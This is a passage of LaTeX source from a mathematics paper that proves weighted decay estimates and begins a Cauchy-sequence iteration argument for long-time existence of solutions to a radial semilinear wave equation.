|u_g|\lesssim& \kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\int_{0}^{1} \rho^{A-1}|g(\rho)|\d\rho\\
\lesssim&\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
In summary, we finish the estimate of $u_g$ when $A<3$.
\value{parta}[Estimate of $u_f$ with $A\in[2,3)$]
Next we consider $u_f$. For simplicity let $u_{g=\phi}$ stand for $u_g$ with $g=\phi$.
By \Le{Le:u_e} and the expression of $u_g$ \eqref{Eq:u_g_c}, we know
\begin{Eq*}
u_f=&\partial_t \kl(u_{g=f}\kr)\\
=&\frac{1}{\Gamma\kl(\frac{A-1}{2}\kr)\Gamma\kl(\frac{3-A}{2}\kr)} \partial_t\kl(t\int_{0}^{1}\int_{-1}^{1} \frac{f\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\frac{A-1}{2}}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\kr)\\
\lesssim &t\int_{0}^{1}\int_{-1}^{1} \frac{\kl|t\sigma^2-r\sigma\lambda\kr|}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}}\frac{\kl|f'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)\kr|}{(1-\sigma^2)^{\frac{A-1}{2}}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\\
&+\int_{0}^{1}\int_{-1}^{1} \frac{\kl|f\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)\kr|}{(1-\sigma^2)^{\frac{A-1}{2}}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\\
\equiv&H_1+H_2.
\end{Eq*}
Since $A\in[2,3)$, we can easily find that $H_2\lesssim \|f\|_{L^\infty}$. Meanwhile, we find that
\begin{Eq*}
H_2\approx&t^{-1}u_{g=|f|}\lesssim t^{-1} \kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\|f(\rho)\|_{L_\rho^\infty}.
\end{Eq*}
Adding together, we finish the estimate of $H_2$. Next we consider $H_1$. Noticing that when $\lambda\in[-1,1]$, we have
\begin{Eq*}
\kl(\frac{t\sigma^2-r\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}}\kr)^2=&\frac{r^2\sigma^2\lambda^2+t^2\sigma^4-2rt\sigma^3\lambda}{r^2+t^2\sigma^2-2rt\sigma\lambda}\leq\sigma^2\leq 1.
\end{Eq*}
Then we calculate
\begin{Eq*}
H_1\lesssim u_{g=|f'|}\lesssim \kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho f'(\rho)\kr\|_{L_\rho^\infty}.
\end{Eq*}
Adding together, we finish the estimate of $u_f$ when $A<3$.
\value{parta}[Estimate of $u_g$ and $u_f$ for $A=3$]
When $A=3$, the estimate for $u_g$ is similar, where we use \eqref{Eq:I_p_5} and \eqref{Eq:I_p_6} instead of \eqref{Eq:I_p_2} and \eqref{Eq:I_p_3}. As for $u_f$, we easily calculate
\begin{Eq*}
u_f=\frac{(t+r)f(t+r)-(t-r)f(|t-r|)}{2r}
\end{Eq*}
with $\supp u_f\subset \{(t,r):|t-r|\leq 1\}$. When $r< t$, by mean value theorem we see
\begin{Eq*}
|u_f|=\kl|\frac{(t+r)f(t+r)-(t-r)f(t-r)}{2r}\kr|\leq \|\partial_\rho(\rho f(\rho))\|_{L_\rho^\infty}.
\end{Eq*}
When $t<r$, we see
\begin{Eq*}
|u_f|\leq|f(t+r)|+|f(r-t)|\lesssim \|f(\rho)\|_{L_\rho^\infty}.
\end{Eq*}
In summary, we obtain the desired estimate of $u_g$ and $u_f$ for $A=3$, and finish the proof of \Le{Le:u0_e}.
\end{proof}
\subsection{Estimate for non-homogeneous solution}
In this subsection, we will omit the initial data and give the estimate of solution to the nonlinear equation \eqref{Eq:u_o}. For simplicity, we shift the time variable and consider the equation
\begin{Eq}\label{Eq:v_o}
\begin{cases}
\kl(\partial_t^2-\partial_r^2-(A-1)r^{-1}\partial_r\kr)v(t,r)=r^{\frac{(A-n)p+n-A}{2}}G(t,r)\\
v(4,r)=0,\qquad v_t(4,r)=0.
\end{cases}
\end{Eq}
\begin{lemma}\label{Le:v_e}
Define $\Omega:=\{(t,r)\in [4,\infty)\times {\mathbb{R}}_+: t>r+2\}$ and $\Lambda(t,r):=\{(s,\rho)\in\Omega:s+\rho<t+r,s-\rho<t-r\}$. We will show that, if $v$ solves the equation \eqref{Eq:v_o} with $\supp v\subset \Omega$, then for any $(t,r)\in\Omega$ and $k=1,2,3$ we have
\begin{Eq}\label{Eq:v_e}
\kl<t+r\kr>^{\frac{A-1}{2}} |v|\lesssim N_k(t-r)\|\omega_k^p G\|_{L_{s,\rho}^\infty(\Lambda)}.
\end{Eq}
Here
\begin{Eq*}
\omega_k(t,r):=&\kl<t+r\kr>^{\frac{A-1}{2}}\beta_k(t-r),\qquad k=1,2,3;\\
\beta_k(t-r):=&\begin{cases}
\kl<t-r\kr>^{\frac{A-1}{2}},&k=1,~for~ p_m<p<p_M,\\
\kl<t-r\kr>^{\frac{(n-1)p-n-1}{2}},& k=2,~for~ p_m<p<p_t,\\
\kl<t-r\kr>^{\frac{A-1}{2}}(\ln\kl<t-r\kr>)^{-1},&k=3,~for~p=p_t>p_d;
\end{cases}
\end{Eq*}
\begin{Eq*}
N_1(t-r):=&\begin{cases}
\kl<t-r\kr>^{\frac{1-A}{2}},&p>\max(p_d,p_t)~or~p=p_d>p_t~or~ p_F<p<p_d,\\
\kl<t-r\kr>^{\frac{1-A}{2}}\ln\kl<t-r\kr>,&p=p_t>p_d~or~p=p_F<p_d,\\
\kl<t-r\kr>^\frac{(1-n)p+n+1}{2},&p_t>p>p_d,\\
\kl<t-r\kr>^\frac{(-n-A+2)p+n+3}{2},&p<\min(p_d,p_F),\\
\kl<t-r\kr>^{\frac{(-n-A+2)p+n+3}{2}}\ln\kl<t-r\kr>,& p=p_d< p_t,\\
\kl<t-r\kr>^{\frac{1-A}{2}} (\ln \kl<t-r\kr>)^2,& p=p_d= p_t;
\end{cases}\\
N_2(t-r):=&\begin{cases}
\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}}&p_S<p<p_t,\\
\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}}\ln \kl<t-r\kr>&p=p_S<p_t,\\
\kl<t-r\kr>^{\frac{(1-n)p^2+2p+n+3}{2}}&p_m<p<\min(p_S,p_t);
\end{cases}\\
N_3(t-r):=&
\kl<t-r\kr>^{\frac{1-A}{2}}\ln\kl<t-r\kr>,\qquad p=p_t>p_d.
\end{Eq*}
\end{lemma}
\begin{remark}
By the definition of $\beta_k$, we can easily find that for any $\xi, \eta>2$
with $\xi/\eta\in (1/2, 2)$, we have
\begin{Eq*}
\beta_k(\xi)\approx \beta_k(\eta).
\end{Eq*}
Also if $2<\eta_1<\eta_2$, we have
\begin{Eq*}
\beta_k(\eta_1)\lesssim\beta_k(\eta_2).
\end{Eq*}
\end{remark}
\begin{proof}[Proof of \Le{Le:v_e}]
Using \Le{Le:u_e}, we find
\begin{Eq*}
v=r^{\frac{1-A}{2}} \int_{\Lambda} I_A(\mu) \rho^{\frac{(A-n)p+n-1}{2}}G(s,\rho)\d\rho\d s,
\end{Eq*}
with $\mu:=\frac{r^2+\rho^2-(t-s)^2}{2 r \rho}$. To reach \eqref{Eq:v_e}, we calculate
\begin{Eq*}
|\kl<t+r\kr>^\frac{A-1}{2} v|\leq& r^{\frac{1-A}{2}}\kl<t+r\kr>^\frac{A-1}{2} \|\omega_k^p G\|_{L_{s,\rho}^\infty (\Lambda)}\int_{\Lambda} |I_A(\mu)| \rho^{\frac{(A-n)p+n-1}{2}}\omega_k^{-p}\d\rho\d s.
\end{Eq*}
Thus, we only need to show that
\begin{Eq}\label{Eq:Jijk}
J_{ij;k}:=r^{\frac{1-A}{2}}\kl<t+r\kr>^\frac{A-1}{2} \int_{\Lambda_{ij}} |I_A(\mu)|\rho^{\frac{(A-n)p+n-1}{2}}\omega_k^{-p}\d\rho\d s\lesssim N_k(t-r)
\end{Eq}
for $i=1,2,3$, $j=1,2$ with
\begin{Eq*}
\Lambda_{11}:=&\{(s,\rho)\in\Lambda: s+\rho\in(t-r,t+r), \rho\leq s/2\};\\
\Lambda_{12}:=&\{(s,\rho)\in\Lambda: s+\rho\in(t-r,t+r), \rho\geq s/2\};\\
\Lambda_{21}:=&\{(s,\rho)\in\Lambda: s+\rho\in\kl(\frac{t-r}{2},t-r\kr), \rho\leq s/2\};\\
\Lambda_{22}:=&\{(s,\rho)\in\Lambda: s+\rho\in\kl(\frac{t-r}{2},t-r\kr), \rho\geq s/2\};\\
\Lambda_{31}:=&\{(s,\rho)\in\Lambda: s+\rho\in\kl(3,\frac{t-r}{2}\kr), \rho\leq s/2\};\\
\Lambda_{32}:=&\{(s,\rho)\in\Lambda: s+\rho\in\kl(3,\frac{t-r}{2}\kr), \rho\geq s/2\}.
\end{Eq*}
\begin{figure}[H]
\centering
\includegraphics[width=0.99\textwidth]{Omega.png}
\end{figure}
It's easy to find that
\begin{Eq}\label{Eq:srho_r}
\begin{cases}
s+\rho\leq 3(s-\rho)\leq 3(s+\rho),&(s,\rho)\in \Lambda_{11}\cup\Lambda_{21}\cup\Lambda_{31},\\
s+\rho\leq 3\rho\leq 3(s+\rho),&(s,\rho)\in \Lambda_{12}\cup\Lambda_{22}\cup\Lambda_{32}.
\end{cases}
\end{Eq}
Then, a quick calculation shows
\begin{Eq}\label{Eq:trsrho_r}
\begin{cases}
t-r\leq s+\rho \leq \min\{t+r,3(t-r)\}, \quad (t-r)/3\leq s-\rho\leq t-r, &(s,\rho)\in \Lambda_{11},\\
t-r\leq s+\rho\leq t+r,\quad 2\leq s-\rho\leq \min\{(t+r)/3,t-r\}, &(s,\rho)\in \Lambda_{12},\\
(t-r)/2\leq s+\rho \leq t-r, \quad (s+\rho)/3\leq s-\rho\leq s+\rho, &(s,\rho)\in \Lambda_{21},\\
(t-r)/2\leq s+\rho\leq t-r,\quad 2\leq s-\rho\leq (t-r)/3, &(s,\rho)\in \Lambda_{22},\\
4\leq s+\rho \leq (t-r)/2, \quad (s+\rho)/3\leq s-\rho\leq s+\rho, &(s,\rho)\in \Lambda_{31},\\
6\leq s+\rho\leq (t-r)/2,\quad 2\leq s-\rho\leq (s+\rho)/3, &(s,\rho)\in \Lambda_{32}.
\end{cases}
\end{Eq}
From now on, we introduce $\xi:=s+\rho$ and $\eta:=s-\rho$.
We will always adopt \eqref{Eq:srho_r} and \eqref{Eq:trsrho_r} in each region.
\setcounter{part0}{0}
\value{parta}[Preparation for $A\in[2,3)$ with $r\leq t/2$]
We will firstly consider $A\in[2,3)$,
notice that $\mu=\frac{r^2+\rho^2-(t-s)^2}{2r\rho}< -1$ when $s+\rho< t-r$, and $\mu> -1$ when $s+\rho> t-r$.
In this part we have
\begin{Eq*}
t+r\leq 3(t-r)\leq 3(t+r).
\end{Eq*}
In the region of $\Lambda_{11}$,
using \eqref{Eq:I_p_3} we have
\begin{Eq}\label{Eq:I_e1}
|I_A(\mu)|\lesssim& (1+\mu)^{\frac{A-3}{2}}
=\kl(\frac{2r\rho}{(r+\rho+t-s)(r+\rho-t+s)}\kr)^{\frac{3-A}{2}}
\lesssim \kl(\frac{\rho}{r+\rho-t+s}\kr)^{\frac{3-A}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{11}\lesssim & r^{\frac{1-A}{2}} \kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{11}} \rho^{\frac{(A-n)p+n-A+2}{2}}\kl<s+\rho\kr>^{-\frac{A-1}{2}p}\beta(s+\rho)^{-p}\kl({r+\rho-t+s}\kr)^{\frac{A-3}{2}}\d\rho\d s\\
\lesssim &r^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{(1-A)p+A-1}{2}}\beta(t-r)^{-p}\int_{t-r}^{t+r}\int_{(t-r)/3}^{t-r} (\xi-\eta)^{\frac{(A-n)p+n-A+2}{2}}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d \eta\d\xi\\
\lesssim& r^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p}\int_{t-r}^{t+r}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d\xi\\
\lesssim&\kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p},
\end{Eq*}
where we noticed $\frac{(A-n)p+n-A+2}{2}> -1$ while $p<p_M$.
In the region of $\Lambda_{12}$, we also have \eqref{Eq:I_e1}. Then we find
\begin{Eq*}
J_{12}\lesssim & r^{\frac{1-A}{2}} \kl<t-r\kr>^{\frac{A-1}{2}}\int_{\Lambda_{12}}\kl<s+\rho\kr>^{\frac{(1-n)p+n-A+2}{2}}\beta(s-\rho)^{-p}\kl({r+\rho-t+s}\kr)^{\frac{A-3}{2}}\d\rho\d s\\
\lesssim & r^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}}\int_{t-r}^{t+r}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d\xi \int_2^{(t+r)/3} \beta(\eta)^{-p}\d\eta\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} \int_2^{t-r} \beta(\eta)^{-p}\d\eta.
\end{Eq*}
In the region of $\Lambda_{21}$,
using \eqref{Eq:I_p_2} and \eqref{Eq:I_p_3}
we have
\begin{Eq}\label{Eq:I_e2}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r-s+\rho)(t-r-s-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim \kl(\frac{r}{t-r-s-\rho}\kr)^{\frac{A-1}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{21}\lesssim & \kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{21}} \rho^{\frac{(A-n)p+n-1}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({t-r-s-\rho}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{(1-A)p+A-1}{2}}\beta(t-r)^{-p} \int_{(t-r)/2}^{t-r}\int_{\xi/3}^{\xi} (\xi-\eta)^{\frac{(A-n)p+n-1}{2}}\kl({t-r-\xi}\kr)^{\frac{1-A}{2}}\d \eta\d\xi\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\beta(t-r)^{-p} \int_{(t-r)/2}^{t-r} \kl(t-r-\xi\kr)^{\frac{1-A}{2}}\d\xi\\
\lesssim&\kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p},
\end{Eq*}
where we require $p<p_M$ to ensure that $\frac{(A-n)+n-1}{2}> -1$.
In the region of $\Lambda_{22}$, we still have
\eqref{Eq:I_e2}. Then we find
\begin{Eq*}
J_{22}\lesssim & \kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{22}}\kl<s+\rho\kr>^{\frac{(1-n)p+n-1}{2}}\beta(s-\rho)^{-p}\kl({t-r-s-\rho}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\lesssim & \kl<t-r\kr>^{\frac{(1-n)p+n+A-2}{2}}\int_{(t-r)/2}^{t-r}\kl(t-r-\xi\kr)^{\frac{1-A}{2}}\d\xi \int_2^{(t-r)/3}\beta(\eta)^{-p}\d\eta\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} \int_2^{(t-r)/3} \beta(\eta)^{-p}\d\eta.
\end{Eq*}
In the region of $\Lambda_{31}$
we have
\begin{Eq}\label{Eq:I_e3}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r-s+\rho)(t-r-s-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim\kl(\frac{r\rho}{(t-r)^2}\kr)^{\frac{A-1}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{31}\lesssim &\kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{31}} \rho^{\frac{(A-n)p+n+A-2}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({t-r}\kr)^{-A+1}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}}\int_4^{(t-r)/2}\int_{\xi/3}^{\xi} (\xi-\eta)^{\frac{(A-n)p+n+A-2}{2}}\kl<\xi\kr>^{\frac{(1-A)p}{2}}\beta(\xi)^{-p}\d \eta\d\xi\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}}\int_4^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A}{2}}\beta(\xi)^{-p} \d\xi,
\end{Eq*}
where we noticed $\frac{(A-n)p+n+A-2}{2}>-1$ while $p<p_M$.
In the region of $\Lambda_{32}$ we still have \eqref{Eq:I_e3}.
Then we find
\begin{Eq*}
J_{32}\lesssim &\kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{32}}\kl<s+\rho\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(s-\rho)^{-p}\kl({t-r}\kr)^{-A+1}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\int_2^{\xi/3}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(\eta)^{-p}\d \eta\d\xi.
\end{Eq*}
\value{parta}[Preparation for $A\in[2,3)$ with $r\geq t/2$]
In this part we have
\begin{Eq*}
t+r\leq 3r\leq 3(t+r).
\end{Eq*}
In the region of $\Lambda_{11}$, we have \eqref{Eq:I_e1}.
Then we find
\begin{Eq*}
J_{11}'\lesssim & \int_{\Lambda_{11}} \rho^{\frac{(A-n)p+n-A+2}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({r+\rho-t+s}\kr)^{\frac{A-3}{2}}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{(1-A)p}{2}}\beta(t-r)^{-p} \int_{t-r}^{3(t-r)}\int_{(t-r)/3}^{t-r} (\xi-\eta)^{\frac{(A-n)p+n-A+2}{2}}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d \eta\d\xi\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n-A+4}{2}}\beta(t-r)^{-p} \int_{t-r}^{3(t-r)}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d\xi\\
\lesssim&\kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p},
\end{Eq*}
again $\frac{(A-n)p+n-A+2}{2}> -1$ since $p<p_M$.
In the region of $\Lambda_{12}$, we have \eqref{Eq:I_e1}.
Then we find
\begin{Eq*}
J_{12}'\lesssim & \int_{\Lambda_{12}}\kl<s+\rho\kr>^{\frac{(1-n)p+n-A+2}{2}}\beta(s-\rho)^{-p} \kl({r+\rho-t+s}\kr)^{\frac{A-3}{2}}\d\rho\d s\\
\leq & \int_{t-r}^{t+r}\kl<\xi\kr>^{\frac{(1-n)p+n-A+2}{2}}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d\xi \int_2^{t-r} \beta(\eta)^{-p}\d\eta\\
\lesssim &
\kl(\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} +\int_{3(t-r)}^{t+r}\kl<\xi\kr>^{\frac{(1-n)p+n-1}{2}}\d\xi\kr)\int_2^{t-r} \beta(\eta)^{-p}\d\eta\\
\lesssim & \kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} \int_2^{t-r} \beta(\eta)^{-p}\d\eta,
\end{Eq*}
where we require $p>p_m$ so that $\frac{(1-n)p+n-1}{2}<-1$.
In the region of $\Lambda_{21}$ we have
\begin{Eq}\label{Eq:I_e4}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r-s+\rho)(t-r-s-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim \kl(\frac{\rho}{t-r-s-\rho}\kr)^{\frac{A-1}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{21}'\lesssim & \int_{\Lambda_{21}} \rho^{\frac{(A-n)p+n+A-2}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({t-r-s-\rho}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\leq &\kl<t-r\kr>^{\frac{(1-A)p}{2}}\beta(t-r)^{-p}\int_{(t-r)/2}^{t-r}\int_{\xi/3}^{\xi} (\xi-\eta)^{\frac{(A-n)p+n+A-2}{2}}\kl({t-r-\xi}\kr)^{\frac{1-A}{2}}\d \eta\d\xi\\
\lesssim& \kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\beta(t-r)^{-p}\int_{(t-r)/2}^{t-r} \kl(t-r-\xi\kr)^{\frac{1-A}{2}}\d\xi\\
\lesssim& \kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p},
\end{Eq*}
where $\frac{(A-n)p+n+A-2}{2}>-1$ since $p<p_M$.
In the region of $\Lambda_{22}$, we have \eqref{Eq:I_e4}.
Then we find
\begin{Eq*}
J_{22}'\lesssim & \int_{\Lambda_{22}}\kl<s+\rho\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(s-\rho)^{-p}\kl({t-r-s-\rho}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\leq &\kl<t-r\kr>^{\frac{(1-n)p+n+A-2}{2}}\int_{(t-r)/2}^{t-r}\kl(t-r-\xi\kr)^{\frac{1-A}{2}}\d\xi \int_2^{(t-r)/3} \beta(\eta)^{-p}\d\eta\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} \int_2^{(t-r)/3} \beta(\eta)^{-p}\d\eta.
\end{Eq*}
In the region of $\Lambda_{31}$, we have
\begin{Eq}\label{Eq:I_e5}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r-s+\rho)(t-r-s-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim \kl(\frac{\rho}{t-r}\kr)^{\frac{A-1}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{31}'\lesssim & \int_{\Lambda_{31}} \rho^{\frac{(A-n)p+n+A-2}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({t-r}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}} \int_4^{(t-r)/2}\int_{\xi/3}^{\xi} (\xi-\eta)^{\frac{(A-n)p+n+A-2}{2}}\kl<\xi\kr>^{\frac{(1-A)p}{2}}\beta(\xi)^{-p}\d \eta\d\xi\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}} \int_4^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A}{2}}\beta(\xi)^{-p}\d\xi,
\end{Eq*}
where $\frac{(A-n)p+n+A-2}{2}>-1$ since $p<p_M$.
In the region of $\Lambda_{32}$, we have \eqref{Eq:I_e5}.
Then we find
\begin{Eq*}
J_{32}'\lesssim& \int_{\Lambda_{32}}\kl<s+\rho\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(s-\rho)^{-p}\kl({t-r}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\int_2^{\xi/3}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(\eta)^{-p} \d \eta\d\xi.
\end{Eq*}
\value{parta}[Estimate for $A\in[2,3)$]
Turning to the proof of \eqref{Eq:Jijk},
we will only present the estimate of $J_{32}$,
and the other terms can be estimated in a similar manner.
At first,
for $J_{32;1}$ with $p_m<p<p_M$,
we have
\begin{Eq*}
J_{32;1}\lesssim \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\int_2^{\xi/3}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\kl<\eta\kr>^{-\frac{A-1}{2}p}\d\eta\d\xi.
\end{Eq*}
When $p>p_d=2/(A-1)$,
it is easy to see that
\begin{Eq*}
J_{32;1}\lesssim \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\d\xi \lesssim N_1(t-r).
\end{Eq*}
Similarly, when $p\le p_d$,
we have
\begin{Eq*}
J_{32;1}\lesssim
\begin{cases}
\kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\ln\xi\d\xi, & p=p_d,\\
\kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{\frac{(-n-A+2)p+n+A}{2}}\d\xi,& p<p_d,
\end{cases}
\end{Eq*} which are controlled by $N_1(t-r)$ and
this finishes the proof of \eqref{Eq:v_e} with $k=1$.
For $J_{32;2}$ with $p_m<p<p_t$, we have
\begin{Eq*}
J_{32;2}\lesssim& \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\d\xi\int_2^{(t-r)/6}\kl<\eta\kr>^{\frac{(1-n)p^2+(n+1)p}{2}} \d \eta\\
\lesssim&\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}}\int_2^{(t-r)/6}\kl<\eta\kr>^{\frac{(1-n)p^2+(n+1)p}{2}} \d \eta\lesssim N_2(t-r).
\end{Eq*}
Finally, for $J_{32;3}$ with $p=p_t>p_d$, we have
\begin{Eq*}
J_{32;3}\lesssim& \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\int_2^{\xi/3}\kl<\xi\kr>^{-1}\kl<\eta\kr>^{\frac{(1-A)p}{2}} (\ln\eta)^{p}\d \eta\d\xi\\
\lesssim& \kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\kl<\xi\kr>^{-1} \d\xi\lesssim \kl<t-r\kr>^{\frac{1-A}{2}}\ln\kl<t-r\kr>= N_3(t-r).
\end{Eq*}
In conclusion, this completes the proof for $A\in[2,3)$.
\value{parta}[Estimate for $A=3$]
The case $A=3$ is much simpler, thanks to \eqref{Eq:I_p_5},
we only need to consider $\Lambda_{11}$ and $\Lambda_{12}$.
By \eqref{Eq:I_p_6} and a similar approach as above we get the desired estimate.
\end{proof}
\subsection{Long-time existence}
In this subsection,
we will construct a Cauchy sequence to approximate the desired solution.
We set $u_{-1}=0$ and let $u_{j+1}$ be the solution of the equation
\begin{Eq}\label{Eq:uj_o}
\begin{cases}
\partial_t^2 u_{j+1} -\Delta_Au_{j+1}=r^{\frac{(A-n)p+n-A}{2}}|u_{j}|^p,\quad r\in {\mathbb{R}}_+,\\
u_{j+1}(0,x)=\varepsilon r^{\frac{n-A}{2}}U_0(r),\quad \partial_t u_{j+1}(0,x)=\varepsilon r^{\frac{n-A}{2}}U_1(r).
\end{cases}
\end{Eq}
By \Le{Le:u0_e} and \Le{Le:v_e},
noticing that for any $p>1$, we have
\begin{Eq*}
\kl||a|^p-|b|^p\kr|\lesssim |a-b|\max(|a|,|b|)^{p-1},
\end{Eq*}
then we see
\begin{Eq*
\kl<t+r\kr>^\frac{A-1}{2}|u_{j+1}|\leq& \varepsilon C_0\kl<t-r\kr>^\frac{1-A}{2}\Psi+C_0N_k(t-r)\|\omega_k u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\kl<t+r\kr>^\frac{A-1}{2}|u_{j+1}-u_{j}|\leq& C_0N_k(t-r)\|\omega_k (u_j-u_{j-1})\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_k u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1},
\end{Eq*}
with $k=1,2,3$ and $C_0$ large enough.
Here
\begin{Eq*}
\Psi:=&\|r^\frac{n-A+2}{2}U_0'(r)\|_{L_r^\infty}+\|r^\frac{n-A}{2}U_0(r)\|_{L_r^\infty}+\|r^\frac{n-A+2}{2}U_1(r)\|_{L_r^\infty},\\
\Lambda(t,r):=&\kl\{(s,\rho)\in\Omega: s+\rho<t+r,s-\rho<t-r\kr\},\\
\Omega:=&\kl\{(t,r)\in {\mathbb{R}}_+^2:t>r-1\kr\}.
\end{Eq*}
